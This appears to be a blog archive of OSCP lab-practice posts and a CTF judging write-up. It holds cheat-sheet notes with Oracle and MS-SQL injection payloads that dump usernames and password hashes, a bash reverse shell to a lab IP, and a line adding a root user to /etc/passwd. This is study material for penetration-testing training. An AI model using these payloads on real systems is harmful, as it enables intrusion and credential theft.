Posts

Showing posts from September, 2020

At 15: OSCP Checkpoint

Opening
5 more down. MAIL, Pedro, and Chris were harder. Peter and Kraken took a few minutes to solve.

Favorites
My top three were MAIL, Pedro, and Chris.

MAIL
This was a hard box. I believe it took me 3 days.

Pedro
The best part about this box was the thought process behind it. It took me a few hours sending different things at it. This type of thinking could be applied to offices and companies. When I got it I thought 'oh. That's pretty clever.'

Chris
This box isn't that hard. My enumeration was terrible. I made notes on what I did wrong. My mistakes and learning from them help on future boxes. This box broke my enumeration tool.

Checkpoint
This was the first time I used one box to get at another. I call it bungee-gum: when you use one target to get at another. I'll try to do more complex bungee-gum techniques. I'm also 5 away from 20. I've seen people with a total of 20 pass the OSCP. I'm way too invested to stop at 20. I want to

Oracle SQL Injection

' OR 1=1--
SELECT First_Name FROM Author WHERE Name = ''
' ORDER BY 3--
' UNION SELECT owner, table_name, id FROM dba_tables--
' UNION SELECT owner, table_name, null FROM all_tables--
' UNION SELECT user, password, null FROM WEB_ADMINS--
' UNION SELECT user, password, null FROM WEB_USERS--
' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_ADMINS'--
' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_USERS'--
' UNION SELECT COLUMN_NAME, null, null FROM ALL_TAB_COLUMNS where TABLE_NAME='USER_PRIVILEGE_MAP'--
' UNION SELECT COLUMN_NAME, version(), null FROM ALL_TAB_COLUMNS where TABLE_NAME='WEB_USERS'--
' UNION SELECT PASSWORD, ADMIN_NAME, ADMIN_ID FROM WEB_ADMINS--
' UNION SELECT PASSWORD, USER_NAME, USER_ID FROM WEB_USERS--
' UNION SELECT NAME, null, null FROM USER_PRIVILEGE_MAP--

Tracelabs Judge Writeup: SANS and Global Missing Persons CTF September 2020

Opening
I applied to be a Trace Labs Judge for the SANS Student and Alumni event. I'm not a past or present SANS student, so the only avenue to participate was judging. I was interested in judging to see what it was like.

For the SANS event I was given 1 team. They weren't active the entire time. I multi-tasked during the event. I cleaned my house, hacked away at my OSCP labs, and checked the submissions every 20 minutes.

Coming into the Global September CTF I thought it would be a bit more busy, but I could still clean and hack away. Oh boy, was I wrong. At the worst I had 30 different submissions in the queue. I was given two teams. One of the teams I recognized. I'm glad I got them because I knew they would keep me busy. They are one of those teams that keeps fighting until the last minute. My 2nd team I didn't recognize, but they also submitted every hour until the last minute. The first and second hour were intense. Mid-day (hours 3-4) were the worst.

Up to 10: OSCP Labs Review - Windows Sweep

Note: Hashes partially hidden and times off.

Opening
Here are five more! I unlocked the IT Department network too. I picked 5 Windows boxes since it's a weakness of mine. After hacking 5 of them, I feel a bit more comfortable.

Current Concerns
Pivoting
Lateral Movement
Windows Privilege Escalation
Active Directory Attacks
Buffer Overflows

I'm watching TCM's Windows Priv Escalation Course: TCM Course. I'll finish it on Saturday, depending on how busy I am as a judge. I learned what VNC is. Don't discount the mount command when samba is acting up. I did some MS-SQL injection. My favorite boxes were DISCO and DJ. My least favorite was Jerry (just because it took me 10 minutes to solve).

Attacking Next
The internal IT Department is on my mind. I also noticed a domain controller.

Music

MS-SQL Notes

' ORDER BY 2--
' UNION SELECT NULL, NULL--
' UNION SELECT 'amanda', NULL--
' UNION SELECT @@version, NULL--
' UNION SELECT DB_NAME(1), NULL--
(master, tempdb, model, msdb, music,)
' UNION SELECT name, NULL FROM master..sysdatabases--
(WHYYY) ^- displays all tables
' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES--
(albums, concerts, singles, songs, users)
' UNION SELECT column_name,NULL FROM information_schema.COLUMNS--
(artist, id, name, pass, place, year)
' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')--
(id, name, pass)
' UNION SELECT name,NULL FROM users--
(alice, brett, eric, peter)
' UNION SELECT pass,NULL FROM users--
(123pass123, 34819d7beeabb9260a5c854bc85b3e99, 5f4dcc3b5aa765d61d8327deb882cf99, 7d9264f1c1c042b799ef08da95a782d4)
CREATE LOGIN amanda WITH PASSWORD = 'password'
' UNION select name, NULL from sys.server_principals--
D

First Five: OSCP Labs Review

Note: Hashes partially covered, just in case they mean something. Time is in GMT.

Opening
I'm back at it again. I decided to sign up for the OSCP PWK instead of doing 40 HtB challenges. I wouldn't meet my December 2020 timeline with that strategy. I do better with a defined timeline. I signed up for 60 days instead of 90. I'm in jeopardy of running out of lab time before I solve all the boxes. It takes me 1-3 days for one box right now.

Four of the boxes I hacked are Linux-based. I've turned my attention to Windows boxes, which is a huge weakness of mine. I feel like I'm gonna need 40-50 hours of practice to solve an easy-medium Windows box in a reasonable amount of time.

Current Concerns
Windows
Too many ports and services on one target
Shellcode Hex Characters
Buffer Overflow
Being Slow
Note Taking

1. Windows - Need more practice
2. Need more practice. I like boxes with fewer ports open. I'm less likely to go down a wrong path

OSCP Master Note File

SHELLS

Bash
Bash Small Shell
/Lab/Mailman$ ./exploit.py 10.11.1.231 "bash -i >& /dev/tcp/192.168.119.184/9999 0>&1"

PHP
PHP Small Shell
$sock, 1=>$sock, 2=>$sock), $pipes); ?>

Linux Privilege Escalation

Add to Password File
openssl passwd evil
echo "vickie:q26boqdSkSLpg:0:0:root:/root:/bin/bash" >> /etc/passwd

Linux Github Files
https://github.com/Anon-Exploiter/SUID3NUM

GCC
gcc -Wall -m32 -Wl,--hash-style=both 9542.c -o 9542

Walkthroughs
TJNulls __

Fan Favorites
https://www.exploit-db.com/exploits/44298 (